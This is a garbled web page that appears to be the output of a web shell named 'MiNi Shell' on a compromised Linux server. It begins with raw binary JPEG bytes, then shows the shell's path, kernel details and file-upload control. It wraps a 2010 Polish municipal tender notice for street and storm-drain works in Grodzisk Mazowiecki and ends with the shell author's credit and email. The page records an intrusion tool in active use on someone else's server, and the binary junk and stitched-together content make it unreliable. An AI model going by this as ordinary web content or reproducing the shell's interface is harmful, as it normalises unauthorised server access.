JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100122/14729-N-2010.html

<p class="kh_header"><b>Grodzisk Mazowiecki: Przebudowa wraz z budową kanalizacji deszczowej ulic: Chłopickiego, Sowińskiego i Zamoyskiego w Grodzisku Mazowieckim</b><br>
<b>Numer ogłoszenia: 14729 - 2010; data zamieszczenia: 22.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Grodzisk Mazowiecki , ul. Kościuszki 32A, 05-825 Grodzisk Mazowiecki, woj. mazowieckie, tel. 022 7555146, faks 022 7555327.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.grodzisk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa wraz z budową kanalizacji deszczowej ulic: Chłopickiego, Sowińskiego i Zamoyskiego w Grodzisku Mazowieckim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Nawierzchnie jezdni, chodników i wjazdów z kostki betonowej brukowej                                                              
           na podbudowie z kruszywa                                                                             -  ok. 7802  m2
       2. Ustawienie krawężników 15x30x100 i obrzeży betonowych 8x30x100        -  ok. 3479  m2
       3. Oznakowanie pionowe                                                                                    -  ok.     26  szt.
       4. Oznakowanie poziome farba chlorokauczukową odblaskową                       -  ok.      25  m2
       5. Studnie rewizyjne o średnicy 1200 mm                                                          -             28 kpl.
       6. Kanały z rur PVC o średnicy zewnętrznej od 160 - 315mm                          -  ok.    661 mb
       7. Studzienki ściekowe uliczne                                                                           -             35 kpl..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.23.21.30-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Każda oferta musi być zabezpieczona wadium  o wartości  30.000 zł 
          wniesionym do dnia 16 luty 2010 r  do godz. 11:00         
             Wadium może być wniesione w  następujących formach:
       -    pieniądzu
-	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
-    gwarancjach bankowych 
-    gwarancjach  ubezpieczeniowych
-    poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt.2  ustawy 
      z dnia 09.11.2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości
      (Dz.u.nr 109 poz.1158 z późn.  zmianami)
             Wadium wnoszone w pieniądzu  należy  wpłacić na konto Urzędu Gminy w  PKO BP S.A. 
              92 1020 1055 0000 9302 0133 2980
             Za skuteczne wniesienie wadium w pieniądzu Zamawiający uważa wadium, 
             które w oznaczonym terminie znajdzie się na koncie Zamawiającego.
       2.  W przypadku składania wadium w formie gwarancji lub poręczeń, powinny być one 
             bezwarunkowe i nieodwołalne, płatne na pierwsze żądanie , sporządzone zgodnie z 
             obowiązującym prawem i winny zawierać następujące elementy:
         -  nazwę dającego zlecenie (wykonawcy) , beneficjenta gwarancji (zamawiającego), gwaranta 
            (banku lub instytucji ubezpieczeniowej udzielającej gwarancji) oraz wskazanie ich siedzib
         -  określenie wierzytelności, która ma być zabezpieczona gwarancją lub poręczeniem
         -  kwotę gwarancji / poręczenia
         -  termin gwarancji / poręczenia
         -  zobowiązanie gwaranta do zapłacenia kwoty gwarancji /poręczenia  na pierwsze 
             pisemne zobowiązanie  żądanie zamawiającego w przypadkach gdy wykonawca 
             którego ofertę  wybrano :
         -  odmówił podpisania umowy na warunkach określonych w ofercie lub
         -  nie wniósł zabezpieczenia należytego wykonania umowy lub
         -  zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy
         -  wykonawca w odpowiedzi na wezwanie o którym mowa w art.26 ust.3 PZP nie złożył 
            dokumentów lub pełnomocnictw o których mowa w art.25 ust.1 PZP.
        3.  Oryginał wniesienia wadium w formie innej niż pieniężna należy złożyć w kasie Urzędu Miasta 
              Grodzisk Maz ul. Kościuszki 32a lub dołączyć do oferty.
        4.   Zamawiający zatrzymuje wadium wraz z odsetkami ,jeżeli wykonawca, którego oferta 
              została wybrana:  
            - odmówi podpisania umowy w/s zamówienia publicznego na warunkach określonych w ofercie,
            - nie wniósł  zabezpieczenia należytego wykonania umowy na zasadach
              określonych w specyfikacji istotnych warunków zamówienia publicznego,
            - zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie
              wykonawcy,
        5.   Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na 
              wezwanie  o którym mowa w art.26 ust.3 , nie złożył dokumentów , o których mowa w art.25 
              ust.1 lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego 
              stronie.
        6.  Wycofanie oferty po upływie terminu składania ofert powoduje utratę wadium. 
        7.  Informacja dotycząca sposobu wniesienia wadium powinno być załączona
             do oferty, lub okazana Komisji Przetargowej przed otwarciem ofert.    
        8.   Zamawiający zwróci niezwłocznie wadium według zasad określonych w art.46 ustawy PZP.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Zamawiający wymaga ,aby Wykonawca spełniał niżej określone warunki ogólne i 
      szczegółowe:
1.  Warunki ogólne:
1.1 Wykonawca nie może podlegać wykluczeniu z postępowania o udzielenie zamówienia na
       podstawie art.24 ust.1 i 2 ustawy z dnia 29.01.2004r.Prawo Zamówień Publicznych z
             dalej ustawą /tekst jednolity Dz. U.  z 2007 r. nr 233, poz. 1655 , z  2008 r.  nr 171, poz. 1058, 
             nr 220, poz. 1420 i nr 227 poz. 1505 oraz z 2009 r.  nr 19, poz. 101, nr 65, poz. 545, nr 91, 
             poz. 742, nr 157, poz.1241, nr 206, poz. 1591/. 

1.2 W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki 
       opisane w punkcie 1.1 musi spełniać każdy z wykonawców wspólnie ubiegających się o 
       udzielenie zamówienia.

2.   Warunki szczegółowe udziału w postępowaniu , określone w oparciu o art.22 ust.1 pkt.1-4
       Ustawy:

2.1 Potencjał ekonomiczno - finansowy
      Zamawiający nie określa warunków szczegółowych dotyczących potencjału ekonomiczno - 
      finansowego.
2.2 Potencjał kadrowy
      Zamawiający nie określa warunków szczegółowych dotyczących potencjału kadrowego.
2.3 Potencjał techniczny
      Zamawiający nie określa warunków szczegółowych dotyczących potencjału technicznego.
2.4 Doświadczenie
      Wykonawca musi wykazać, że w okresie ostatnich 5 lat przed dniem wszczęcia niniejszego    
      postępowania , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował 
      /zakończył/  co najmniej 2 zadania o zakresie porównywalnym do przedmiotu niniejszego 
      zamówienia i wartości nie niższej niż 600.000 zł.
      Przez zadanie o zakresie porównywalnym do przedmiotu  niniejszego zamówienia rozumie się 
      roboty polegające na budowie, przebudowie lub remoncie dróg, ulic, placów,  chodników.
    
      Doświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
      Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie
      Spełniają warunek określony w punkcie 2.4

      Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:

       Ocena spełniania warunków udziału w postępowaniu dokonywana będzie na podstawie 
       dokumentów i oświadczeń załączonych do oferty zgodnie z formułą spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.   Dla potwierdzenia spełniania warunków ogólnych, Wykonawcy winni przedłożyć
      niżej  wymienione dokumenty:

1.1 Oświadczenie o spełnianiu warunków określonych w art.22 ust.1 ustawy. /zał. nr 5/
      1.2 Aktualny odpis z właściwego rejestru  albo aktualne  zaświadczenie o wpisie do ewidencji 
            działalności gospodarczej, jeżeli  odrębne przepisy wymagają  wpisu do rejestru lub zgłoszenia
            do ewidencji  działalności gospodarczej wystawionego nie wcześniej niż  6 miesięcy przed 
            upływem terminu składania ofert    
      1.3  Aktualne zaświadczenia   właściwego naczelnika  Urzędu Skarbowego oraz  właściwego   
            oddziału Zakładu Ubezpieczeń  Społecznych  lub Kasy Rolniczego Ubezpieczenia      
            Społecznego potwierdzające  odpowiednio,  że    Wykonawca  nie zalega z opłacaniem 
            podatków, opłat oraz  składek  na ubezpieczenie zdrowotne  lub społeczne   lub zaświadczeń , 
            że uzyskał prawem przewidziane zwolnienie ,  odroczenie lub rozłożenie na raty zaległych 
            płatności lub wstrzymanie  w całości wykonania decyzji organu , wystawione  nie wcześniej niż
            3 miesiące przed upływem terminu składania ofert.
      1.4  Aktualną informację z Krajowego Rejestru Karnego albo równoważnego zaświadczenia 
            właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie 
            określonym w art.24 ust.1 p.4-8 ustawy, wystawionych nie wcześniej niż 6 miesięcy przed 
            upływem terminu składania  wniosków o dopuszczenie do udziału w postępowaniu o udzielenie 
            zamówienia albo składania ofert.
      1.5  Aktualną informację z Krajowego Rejestru Karnego  w zakresie określonym w art. 24 ust.1 p.9 
            ustawy  PZP wystawioną  nie wcześniej niż 6 miesięcy przed upływem  terminu  składania 
            wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania 
            ofert.
1.6	W celu potwierdzenia  spełniania warunków ogólnych wymaganych od wykonawców 
składających wspólną  ofertę:
       a/  oświadczenie wymienione w punkcie 1.1 powinno być złożone w imieniu wszystkich 
           Wykonawców,
       b/  dokumenty o których mowa w punkcie 1.2 powinny być złożone przez każdego z 
            Wykonawców.
           W przypadku wspólników spółek cywilnych należy załączyć aktualne zaświadczenie o wpisie do 
             ewidencji działalności gospodarczej każdego ze wspólników.

      2.   Na potwierdzenie spełniania warunków szczegółowych , wykonawcy winni przedłożyć 
             następujące dokumenty:

      2.1 Wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcia 
            postępowania, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie /zał. nr 6/ 
            /doświadczenie Wykonawcy/.Do informacji winny być dołączone dokumenty potwierdzające, że 
            wymienione w  informacji roboty zostały wykonane należycie.
2.2 Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej 
            Polskiej stosuje się do przepisów § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja
            2006r w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz 
            form, w jakich te dokumenty mogą być składane /Dz.U. z 2006r. nr 87 poz.605 ze zm./
2.3	W celu potwierdzenia spełniania warunków szczegółowych wymaganych od Wykonawców 
      składających wspólną ofertę , dokumenty wymienione w punkcie 2 winien przedłożyć w 
      imieniu wszystkich ten, lub ci spośród wykonawców składających wspólną ofertę, w stosunku
      do których z SIWZ lub umowy regulującej zasady współpracy wynika, że powinni potwierdzić 
      spełnianie warunku.
  2.4 Wykonawca, który prowadzi działalność gospodarczą w formie spółki z ograniczoną 
         odpowiedzialnością a zobowiązanie do świadczenia stanowi wartość dwukrotnie przewyższającą 
         wysokość kapitału zakładowego, najpóźniej w dniu podpisania umowy jest zobowiązany 
         dostarczyć zamawiającemu uchwałę zgodnie z  art.230 Kodeksu Spółek Handlowych lub odpis-
         wypis z umowy spółki zezwalający na zaciąganie takich zobowiązań..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip-oit.grodzisk.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Grodzisku Maz., ul. Kościuszki 32a, 05-825 Grodzisk Mazowiecki, pok. nr 107..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.02.2010 godzina 11:00, miejsce: Kancelaria Notarialna w Grodzisku Mazowieckim, Notariusz Beata Maria Kuczyńska, Notariusz Piotr Kuczyński S.C. , ul. Bartniaka 12 A, 05-825 Grodzisk Maz..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com